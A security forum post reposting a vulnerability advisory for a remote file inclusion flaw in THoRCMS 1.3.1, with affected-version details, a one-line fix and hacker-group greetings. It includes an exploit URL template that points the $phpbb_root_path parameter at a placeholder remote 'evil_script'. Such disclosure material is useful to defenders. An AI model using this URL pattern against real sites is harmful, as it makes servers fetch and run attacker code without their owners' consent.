Jump to content
Guest Nemessis

[RST] THoRCMS <= 1.3.1 RFI

By Guest Nemessis, in Proiecte RST

Recommended Posts

Guest Nemessis

Guest Nemessis

Posted
Posted

http://www.milw0rm.com/exploits/1952

---------------------------------------------------------------------------

THoRCMS <= 1.3.1 ([phpbb_root_path]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : THoRCMS

version : latest version [ 1.3.1 ]

Description: A CMS/Portal for phpBB

URL : http://www.phpbbhacks.com/download/2349

------------------------------------------------------------------

Exploit:

~~~~~~~~

Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~~

declare variabel $phpbb_root_path

---------------------------------------------------------------------------

Shoutz:

~~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://rstcenter.com ]

-------------------------------- [ EOF] ----------------------------------

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...